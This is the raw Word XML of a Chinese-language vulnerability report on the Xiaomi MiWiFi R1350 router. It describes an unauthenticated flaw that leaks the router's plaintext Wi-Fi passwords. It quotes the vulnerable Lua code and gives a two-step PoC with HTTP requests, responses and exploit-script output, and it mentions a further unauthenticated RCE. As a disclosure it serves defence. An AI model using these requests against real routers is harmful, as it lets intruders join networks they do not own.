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68B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sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>小米 MiWiFi R1350 路由器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2B85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厂商：小米（Xiaomi）</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="7999FD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产品：小米 AIoT 路由器 R1350（AC1200）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AF98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固件版本：1.0.31（miwifi_r1350_firmware_7449d_1.0.31.bin，QSDK / OpenWrt，MIPS32 大端）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE82F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漏洞类型：未授权敏感信息泄露（CWE-200）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F281E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sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768C35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小米 MiWiFi R1350（固件 1.0.31）存在一个未授权信息泄露漏洞，LAN 侧攻击者无需任何认证即可获取路由器的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:b/>
          <w:bCs/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>明文 Wi-Fi 密码（2.4G 和 5G 的 SSID 及密钥）</w:t>
      </w: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。两个接口相互配合（均以授权标志位 </w:t>
      </w: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0x09</w:t>
      </w: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 = noauth + noinit 注册）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1E8A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GET /cgi-bin/luci/api/misystem/get_wifi_pwd_url?rsa_pubkey=&lt;攻击者控制的公钥&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A59AE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GET /cgi-bin/luci/api/misystem/get_wifi_pwd?token=&lt;设备 UUID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162119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该流程的设计初衷是小米 IoT 配网握手（智能设备向路由器请求用设备自身公钥加密的 Wi-Fi 凭据）。但由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>任何人</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>都可以提供</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>任意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>公钥——包括攻击者自己持有私钥的公钥——凭据的保密性形同虚设：攻击者“加密给自己”，再在本地解密。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DA8C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sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>漏洞详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B049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组件：</w:t>
      </w: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/usr/lib/lua/luci/controller/api/misystem.lua</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>（1.0.31）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB5B9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getWifiPwdUrl()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>（第 4125 行起）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F834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71770" cy="4301490"/>
            <wp:effectExtent l="0" t="0" r="508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1D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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="4173220"/>
            <wp:effectExtent l="0" t="0" r="381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7C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local rsa_pub_key = LuciHttp.formvalue("rsa_pubkey") -- 攻击者控制，无任何校验</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C90C7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write_txt(CACHE_PUBKEY_PATH, rsa_pub_key)       -- /tmp/iot_pubkey_cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2949A6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local timestamp = os.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A1B1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write_txt(CACHE_TIME_PATH, timestamp)         -- 300 秒有效窗口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AD44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local token = read_txt(UUID_PATH)           -- /proc/sys/kernel/random/uuid（设备 UUID）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667C2E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write_txt(CACHE_TOKEN_PATH, token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B818E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local url = string.format('http://%s/cgi-bin/luci/api/misystem/get_wifi_pwd?token=%s', lanip, token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E04AE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local url_new = lua_crypto.lua_rsa_pubkey_encrypt(url, rsa_pub_key) -- 用攻击者的公钥加密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DF50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result["url"] = XQCryptoUtil.binaryBase64Enc(url_new)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376E79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getWifiPwd()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>（第 4230 行起）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD515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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="4276725"/>
            <wp:effectExtent l="0" t="0" r="698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719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local token = LuciHttp.formvalue("token")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B67D1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local token_local = read_txt(CACHE_TOKEN_PATH)    -- 固定的设备 UUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4B74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if token_local ~= nil and token == token_local then  -- 仅与攻击者刚拿到的 UUID 做相等比较</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183657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  -- 300 秒时间戳检查，而时间戳由攻击者自己的第 1 步请求设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780A0C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...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A04D5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local pwd_origin = json.encode(iot_info)       -- {2gssid, 2gpwd, 5gssid, 5gpwd} 明文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760AF3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local rsa_pub_key = read_txt(CACHE_PUBKEY_PATH)    -- 攻击者的公钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB5A0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local pwd_new = lua_crypto.lua_rsa_pubkey_encrypt(pwd_origin, rsa_pub_key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDCBA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result["info"] = XQCryptoUtil.binaryBase64Enc(pwd_new)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0279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bdr w:val="none" w:color="auto" w:sz="0" w:space="0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设计缺陷：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C559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公钥完全由攻击者控制且无需认证，因此加密对请求方而言不提供任何保密性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8446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</w:rPr>
      </w:pP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token</w:t>
      </w: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 并非秘密：它是设备 UUID（</w:t>
      </w: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/proc/sys/kernel/random/uuid</w:t>
      </w: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），并且由 </w:t>
      </w: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get_wifi_pwd_url</w:t>
      </w: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 亲手交给攻击者（用攻击者自己的公钥 RSA 加密）。300 秒有效窗口同样由攻击者自己的请求激活。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4A96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rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
        </w:rPr>
      </w:pP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read_txt()</w:t>
      </w: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 只读取单行，而 </w:t>
      </w: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librsa.so</w:t>
      </w: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（mbedTLS 的 </w:t>
      </w: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pk_parse_public_key</w:t>
      </w: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，经由 </w:t>
      </w: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public_encrypt_keybuf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>）接受</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:b/>
          <w:bCs/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>单行 base64（SPKI DER）公钥</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>——这正是攻击者会提供的格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557B21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8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>漏洞证明（PoC）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749C168C">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="3373755"/>
            <wp:effectExtent l="0" t="0" r="63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E48D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="904240"/>
            <wp:effectExtent l="0" t="0" r="317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892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GET /cgi-bin/luci/api/misystem/get_wifi_pwd_url?rsa_pubkey=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA... HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B3CF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Host: 192.168.31.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00711C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​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789ADE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响应（</w:t>
      </w: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url</w:t>
      </w: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 = base64(RSA_&lt;攻击者公钥&gt;(包含 token 的 url))）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D196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{"url":"PNw08FvhHDk4+/TkIhzrs2K3x4LfOTluzKy2wBpRPB55B0nLA72YKxPlaRhGVQDdM...","code":0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC8C6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用攻击者的私钥解密后：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1165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http://192.168.31.1/cgi-bin/luci/api/misystem/get_wifi_pwd?token=e95f2a41-7c3b-4d58-9a1f-3b2c8d61f7a4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095B2F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第 2 步：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1D47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GET /cgi-bin/luci/api/misystem/get_wifi_pwd?token=e95f2a41-7c3b-4d58-9a1f-3b2c8d61f7a4 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB5AB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Host: 192.168.31.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4840D4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​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620456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>响应（</w:t>
      </w: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info</w:t>
      </w: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 = base64(RSA_&lt;攻击者公钥&gt;(json))）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A5B9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{"info":"r67C5hYqAuxfycfvVawut4ecungrVe44YSWeNOufxr8Gb92yXFHi84I81aLfcdO...","code":0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331C18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sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>影响</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DE20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完全未授权的 LAN 侧攻击者可以获取两个 Wi-Fi 的明文密码并加入网络——这通常正是路由器本应守护的信任边界。加入网络后还可进一步利用 </w:t>
      </w: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sns_init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的未授权 RCE（任何 DHCP 客户端均可触达）及其他需认证的攻击面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172C4E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  <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>复现结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D597A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Style w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:b/>
          <w:bCs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2" name="图片 1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1392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Style w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:b/>
          <w:bCs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0" name="图片 12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1D41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  <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:b/>
          <w:bCs/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>已在 qemu-mips + chroot 模拟的固件环境中（原始 nginx → fcgi-cgi → LuCI 栈）动态验证。自动化 PoC（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>exp_wifi_pwd_leak.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>，生成一次性 RSA-2048 密钥对，执行两个请求并解密两段密文）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF1F3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$ python exp_wifi_pwd_leak.py 192.168.1.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1338E1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[*] Step1 GET get_wifi_pwd_url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C419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[+] Step1 解密 url: http://192.168.31.1/cgi-bin/luci/api/misystem/get_wifi_pwd?token=e95f2a41-...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA157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[+] token = e95f2a41-7c3b-4d58-9a1f-3b2c8d61f7a4 (设备 UUID, 300s 内有效)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3405F6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[*] Step2 GET get_wifi_pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA757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[+] ================= WiFi 凭证 (未授权获取) =================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33964D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 5gpwd = PocSecret#5G</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DC0C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 2gpwd = PocSecret#2G</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8402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 5gssid = Xiaomi_POC_5G</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8BF1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/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="23241F"/>
        </w:rPr>
        <w:t> 2gssid = Xiaomi_POC_2G</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2063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标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="408CC2B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗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1" w:fontKey="{1FB14500-0392-41EC-9160-5EFE14BBD92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33D486"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F033D48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CFD5057"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CFD5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BF35F7"/>
    <w:rsid w:val="284502B4"/>
    <w:rsid w:val="47AE3BB8"/>
    <w:rsid w:val="52F52E3D"/>
    <w:rsid w:val="734A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b/>
      <w:bCs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2025-02-10T06:03:00Z</dcterms:created>
  <dc:creator>11226</dc:creator>
  <cp:lastModifiedBy>cinqseptfive</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-17T02:21:41Z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783E61DC5BDD4CA294A964ED3C1204EC_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiYjkyZmNhZmMwYTRkMzdjNDc0ZDBiODA4ZTNmNjg2YzYiLCJ1c2VySWQiOiIxNDQ5MzUxNjY0In0=</vt:lpwstr>
  </property>
</Properties>
</file>